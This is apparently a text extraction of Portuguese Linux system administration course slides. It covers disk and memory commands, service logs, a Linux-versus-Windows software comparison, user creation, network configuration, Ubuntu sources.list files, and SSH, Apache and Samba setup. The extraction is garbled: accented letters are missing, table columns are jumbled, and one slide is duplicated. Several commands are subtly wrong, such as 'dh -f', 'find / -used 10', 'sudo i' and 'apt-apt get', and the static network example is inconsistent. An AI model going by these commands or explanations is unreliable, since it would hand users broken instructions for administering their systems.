sudo mount /dev/cdrom /cdrom umount /cdrom ps aux |grep console Kill -9 <numero processo>
j Localizar arquivos no computador => find ou locate
$ find caminho expresses updatedb & locate <arquivo> Ex: Para localizar arquivos que foram acessados nos ltimos 10 dias e os arquivos cujo nome seja sysconfig $ find / -used 10 e $locate sysconfig Exerccio: Localizar todos os arquivos que possuam a palavra host e que estejam dentro da pasta /var
Comandos bsicos
j verificar o espao em disco => df h j verificar o que o diretrio possue e o tamanho => du h j Verificar memria => free j Verifica os espaos por parties => dh -f
j Verifica o tamanho dos arquivos e faz a soma do total no final =>df -h c j Verificar o processador do servidor => cat /proc/cpuinfo j reparar disco (*) => fsck -cy /dev/???
Exerccio: Gostaria de saber quanto tenho de espao de disco livre e quanto de espao o meu diretrio, a quantidade de memria total e livre, qual o meu processador, a quantidade de processos rodando nele e reparar o meu disco
293
servios e resolues de problemas dhcpd ==> /etc/rc.d/init.d/dhcpd restart samba ==> /etc/rc.d/init.d/smb restart apache ==> /etc/rc.d/init.d/httpd restart sendmail ==> /etc/rc.d/init.d/sendmail restart
verificaes de logs dhcpd ==> /var/log/mensages samba ==> /var/log/samba/log.smb log.nmb log.<nm do computador> apache ==> /var/log/httpd/access_log sendmail ==> /var/log/maillog printer ==> /var/log/spooler
arquivos para serem backpeados usurio ==> /etc/passwd grupos ==> /etc/group conf impressora ==> /etc/printcap tabela de IP ==> /etc/hosts dhcpd ==> /etc/dhcpd.conf sendmail ==> /etc/sendmail.cf samba ==> /etc/smb.conf senhas do samba ==> /etc/smbpasswd apache ==> /etc/httpd/conf/acess.conf /etc/httpd.conf /etc/srm.conf
j
294
Linux
Open Office
Diferenas
O Open Office possui todos os recursos do Word, excel e power point alm de ter a interface grfica igual, menus e teclas de atalho idnticas ao office, o que facilita a migrao. Tambm trabalha com arquivos no formato office 97/2000 e no vulnervel a vrus de macro. Existem diversas ferramentas de conceito para bancos de dados corporativos no Linux. Todos produtos compatveis com outras plataformas. Centenas de programas de E-Mail tanto em modo texto como em modo grfico. Instale, avalie e escolha. Os trs primeiros para modo grfico e o lynx opera em modo texto. Muito prtico e fcil de operar. Possibilita a mudana completa da aparncia do programa atravs de Skins. A organizao dos menus deste programa outro ponto de destaque. Permite conversar diretamente com usurios do Microsoft MSN. Fcil de usar, possui muitos scripts que permitem a criao rpida e fcil de qualquer tipo de efeito profissional pelo usurio mais leigo. Acompanha centenas de efeitos especiais e um belo manual em html com muitas fotos aproximadamente 20MB) que mostra o que possvel se fazer com ele. 295
MS Access
MySQL, PostgreSQL Oracle Pine, icedove evolutionmutt sylpheed, Firefox, Opera, Mozilla, lynx. LICQ, PIDGIM, SIM AMSN, PIDGIM The Gimp
MS Outlook
Linux
GIMP Inkscape, Sodipodi Qcad dia xmms mplayer, playmidi xwave, cron talk, ytalk
Diferenas
Programa com funes genricas Programas equivalentes Programa com funes genricas Possui funcionalidades identicas e timo conjunto de cones Possui todos os recursos do programa para Windows alm de filtros que permite acrescentar efeitos digitais da msica (em tempo real), eco, etc. Programas para execuo de arquivos de msica e videos multimdia. Existem outras alternativas, a escolha depende de seu gosto e da sofisticao do programa. Pouca diferena. O cron da mais liberdade na programao de tarefas a serem executadas pelo Linux. O talk e o ytalk permite a conversa de dois usurios no s atravs de uma rede local, mas de qualquer parte do planeta, pois usa o protocolo tcp/ip para comunicao. Muito til e fcil de usar. O apache o servidor WEB mais usado no mundo (algo em torno de 75% das empresas), muito rpido e flexvel de se configurar. 72% da base de servidores de emails no mundo atualmente roda em software livre. Os mais recomendados so o Postfix e o qmail, devido a segurana, velocidade e integridade de mensagem
296
Linux
Squid, Apache Ip masquerade, nat, diald, exim,
Diferenas
,A migrao de um servidor proxy para Linux requer o uso de vrios programas separados para que se tenha um resultado profissional. Isto pode parecer incomodo no comeo, mas voc logo perceber que a diviso de servios entre programas mais produtivo. Quando desejar substituir um deles, o funcionamento dos outros no sero afetados. No vou entrar em detalhes sobre os programas citados ao lado, mas o squid um servidor proxy Web (HTTP e HTTPS) completo e tambm apresenta um excelente servio FTP. Possui outros mdulos como dns, ping, restries de acesso, limites de tamanho de arquivos, cache, etc. Sem comentrios... todas so ferramentas para de grandes Web Sites. O wdm, gerao de contedo por exemplo, usado na gerao (http://www.debian.org) em 30 idiomas diferentes.
MS Frontpage
Mozilla e muitas outras ferramentas para a gerao WEB (como zope, do site da distribuio Debian php3, php4, wdm, htdig) Sem equivalente
MS Winsock
O Linux tem suporte nativo a tcp/ip desde o comeo de sua existncia e no precisa de nenhuma camada de comunicao entre ele e a Internet. A performance aproximadamente 10% maior em conexes Internet via fax-modem e outras redes tcp/ip. Os maiores fabricantes de anti-virus norton, F-Prot, ViruScan disponibilizam verses para Linux,com o objetivo principal de remoo de vrus em servidores de E-mail ou servidores de arquivos, com o objetivo de no contaminar os vulnerveis sistemas Windows, servindo como uma efetiva barreira de defesa na rede. 297
Linux
Squid, Apache Ip masquerade, nat, diald, exim,
Diferenas
,A migrao de um servidor proxy para Linux requer o uso de vrios programas separados para que se tenha um resultado profissional. Isto pode parecer incomodo no comeo, mas voc logo perceber que a diviso de servios entre programas mais produtivo. Quando desejar substituir um deles, o funcionamento dos outros no sero afetados. No vou entrar em detalhes sobre os programas citados ao lado, mas o squid um servidor proxy Web (HTTP e HTTPS) completo e tambm apresenta um excelente servio FTP. Possui outros mdulos como dns, ping, restries de acesso, limites de tamanho de arquivos, cache, etc. Sem comentrios... todas so ferramentas para de grandes Web Sites. O wdm, gerao de contedo por exemplo, usado na gerao (http://www.debian.org) em 30 idiomas diferentes.
MS Frontpage
Mozilla e muitas outras ferramentas para a gerao WEB (como zope, do site da distribuio Debian php3, php4, wdm, htdig) Sem equivalente
MS Winsock
O Linux tem suporte nativo a tcp/ip desde o comeo de sua existncia e no precisa de nenhuma camada de comunicao entre ele e a Internet. A performance aproximadamente 10% maior em conexes Internet via fax-modem e outras redes tcp/ip. Os maiores fabricantes de anti-virus norton, F-Prot, ViruScan disponibilizam verses para Linux,com o objetivo principal de remoo de vrus em servidores de E-mail ou servidores de arquivos, com o objetivo de no contaminar os vulnerveis sistemas Windows, servindo como uma efetiva barreira de defesa na rede. 298
Criao de Usurios
j sudo adduser <nome_user> j sudo passwd <nome_user> j cat /etc/passwd j cat /etc/group
Exerccio: Crie um usurio com o seu nome, e um grupo chamado aula. Associe o usurio ao grupo aula e depois ao grupo virtual
$sudo adduser <nome> $sudo addgroup aula $vi /etc/group $vi /etc/passwd
299
Configurao de rede
j
1. Descubra o modelo de sua placa de rede, digite: # lspci O resultado de ser algo como: Ethernet controller: VIA Technologies, Inc. VT6105 [Rhine-III] (rev8b) 2. Agora veja em que eth o seu sistema identificou a placa, se for uma nica placa de rede provavelmente eth0. Use o comando: # cat /var/log/messages | egrep "eth" O resultado dever ser: Oct 20 11:18:55 fw2 kernel: eth0: VIA VT6105 Rhine-III at 0xec00, 00:xx:xx:xx:xx:xx, IRQ 5. 3. Beleza, sabendo que sua placa uma VIA Rhine, carregue o mdulo referente. # vi /etc/modules Coloque o seguinte: alias eth0 via-rhine.ko
300
Configurao de rede
4. Vamos editar o arquivo que verificado quando o servio de rede iniciado: # vi /etc/network/interfaces Coloque a seguinte linha neste arquivo para ip dinmico: auto eth0 iface eth0 inet dhcp ou o seguinte linhas para ip fixo: auto eth0 iface eth0 inet static address 192.168.0.1 network 192.168.254.254 broadcast 192.168.0.255 gateway 192.168.0.254 5. Para iniciar o servio de rede execute o comando: # invoke-rc.d network start
301
Configurao de rede
j
s testar agora: # ping 192.168.254.35 PING 192.168.254.35 (192.168.254.35) 56(84) bytes of data. 64 bytes from 192.168.254.35: icmp_seq=0 ttl=64 time=0.262 ms 64 bytes from 192.168.254.35: icmp_seq=1 ttl=64 time=0.102 ms 64 bytes from 192.168.254.35: icmp_seq=2 ttl=64 time=0.155 ms 6. Para confirmar se sua interface est ativa digite: # ifconfig Se estive ok deve mostrar: eth0 Encapsulamento do Link: Ethernet Endereo de HW 00:xx:xx:xx:xx:xx inet end.: 192.168.0.1 Bcast:192.168.0.255 Masc:255.255.255.0 UP BROADCASTRUNNING MULTICAST MTU:1500 Mtrica:1 pacotes RX:13951137 erros:0 descart.:0 sobrepos.:0 quadro:0 pacotes TX:9849100 erros:0 descart.:0 sobrepos.:0 portadora:0 colises:0 txqueuelen:1000 RX bytes:4069140904 (1.6 Mb) TX bytes:1802073588 (8.5 Mb) IRQ:10 Endereo de E/S:0xde00 7. No esquea de colocar o servio para ser iniciado toda vez que ligar a mquina. Use o comando: # update-rc.d -f network defaults
302
Configurao de servios
j Editar o arquivo souce.list
- vi /etc/apt/souce.list
# Ubuntu supported packages deb http://us.archive.ubuntu.com/ubuntu hardy main restricted deb-src http://us.archive.ubuntu.com/ubuntu hardy restricted main multiverse universe deb http://us.archive.ubuntu.com/ubuntu hardy-updates main restricted deb-src http://us.archive.ubuntu.com/ubuntu hardy-updates restricted main multiverse universe deb http://security.ubuntu.com/ubuntu hardy-security main restricted deb-src http://security.ubuntu.com/ubuntu hardy-security restricted main multiverse universe # Ubuntu community supported packages deb http://us.archive.ubuntu.com/ubuntu hardy universe multiverse deb http://us.archive.ubuntu.com/ubuntu hardy-updates universe multiverse deb http://security.ubuntu.com/ubuntu hardy-security universe multiverse # Ubuntu backports project deb http://us.archive.ubuntu.com/ubuntu hardy-backports main restricted universe multiverse deb-src http://us.archive.ubuntu.com/ubuntu hardy-backports main restricted universe multiverse deb http://us.archive.ubuntu.com/ubuntu hardy-proposed restricted main multiverse universe deb-src http://us.archive.ubuntu.com/ubuntu hardy-proposed restricted main multiverse universe
303
Sources.list para a famlia Ubuntu Feisty Fawn # See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to # newer versions of the distribution. deb http://br.archive.ubuntu.com/ubuntu/ feisty main restricted deb-src http://br.archive.ubuntu.com/ubuntu/ feisty main restricted ## Major bug fix updates produced after the final release of the ## distribution. deb http://br.archive.ubuntu.com/ubuntu/ feisty-updates main restricted deb-src http://br.archive.ubuntu.com/ubuntu/ feisty-updates main restricted ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team, and may not be under a free licence. Please satisfy yourself as to ## your rights to use the software. Also, please note that software in ## universe WILL NOT receive any review or updates from the Ubuntu security ## team. deb http://br.archive.ubuntu.com/ubuntu/ feisty universe deb-src http://br.archive.ubuntu.com/ubuntu/ feisty universe ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team, and may not be under a free licence. Please satisfy yourself as to ## your rights to use the software. Also, please note that software in ## multiverse WILL NOT receive any review or updates from the Ubuntu ## security team. deb http://br.archive.ubuntu.com/ubuntu/ feisty multiverse deb-src http://br.archive.ubuntu.com/ubuntu/ feisty multiverse ## Uncomment the following two lines to add software from the 'backports' ## repository. ## N.B. software from this repository may not have been tested as ## extensively as that contained in the main release, although it includes ## newer versions of some applications which may provide useful features. ## Also, please note that software in backports WILL NOT receive any review ## or updates from the Ubuntu security team. deb http://br.archive.ubuntu.com/ubuntu/ feisty-backports main restricted universe multiverse deb-src http://br.archive.ubuntu.com/ubuntu/ feisty-backports main restricted universe multiverse deb http://security.ubuntu.com/ubuntu feisty-security main restricted deb-src http://security.ubuntu.com/ubuntu feisty-security main restricted deb http://security.ubuntu.com/ubuntu feisty-security universe deb-src http://security.ubuntu.com/ubuntu feisty-security universe deb http://security.ubuntu.com/ubuntu feisty-security multiverse deb-src http://security.ubuntu.com/ubuntu feisty-security multiverse
304
Configurao de servios
j Apt-get update j Apt-get upgrade j Apt-get install <pacote ou servio>
305
Instalao do SSH
j sudo apt-apt get update j sudo apt-get install openssh-server j vi /etc/ssh/sshd_config j sudo /etc/init.d/ssh restart j Putty free e winscp
306
Instalao do Apache
j sudo apt-get install apache2 j Verificar o Local da pasta Base:
/var/www/ (colocar primeiro na sua pasta home e depois usar o comando sudo cp R /home/virtual/site2 /var/www/
307
Instalao do Apache
inicial, no nosso caso ser acrescentar o index.htm, isto dentro do diretrio /etc/apache2/httpd.conf sudo i /etc/apache2/httpd.conf <IfModule dir_module> DirectoryIndex index2.htm index.html index.htm index.shtml index.php index.php5 index.php4 index.php3 index.phtml index.cgi </IfModule>
j Alterar o arquivo de procurar do nome
308
Instalao do samba
j apt-get install samba j Editar o arquivo /etc/samba/smb.conf
vi /etc/samba/smb.conf
j Reinicializar o servio
[global] workgroup = AULA netbios name = SRV-AULA # server string = %h server (Samba, Ubuntu) server string = #---------------------------------------------# kernel oplocks = no socket options = TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=8192 SO_SNDB$ #-----------------------------------------------passdb backend = tdbsam security = user username map = /etc/samba/smbusers name resolve order = wins bcast hosts domain logons = yes preferred master = yes wins support = yes
310
#============== Share Definitions ================== [printers] comment = All Printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 #nome do compartilhamento [arquivos] comment = Pasta Publica path = /arquivos valid users = teste #force group = users create mask = 0660 directory mask = 0771 writable = yes
311
312
313
Reflexo:
Os computadores so incrivelmente rpidos, precisos e burros; os homens so incrivelmente lentos, imprecisos e brilhantes; juntos, seu poder ultrapassa os limites da Imaginao Albert Einstein
315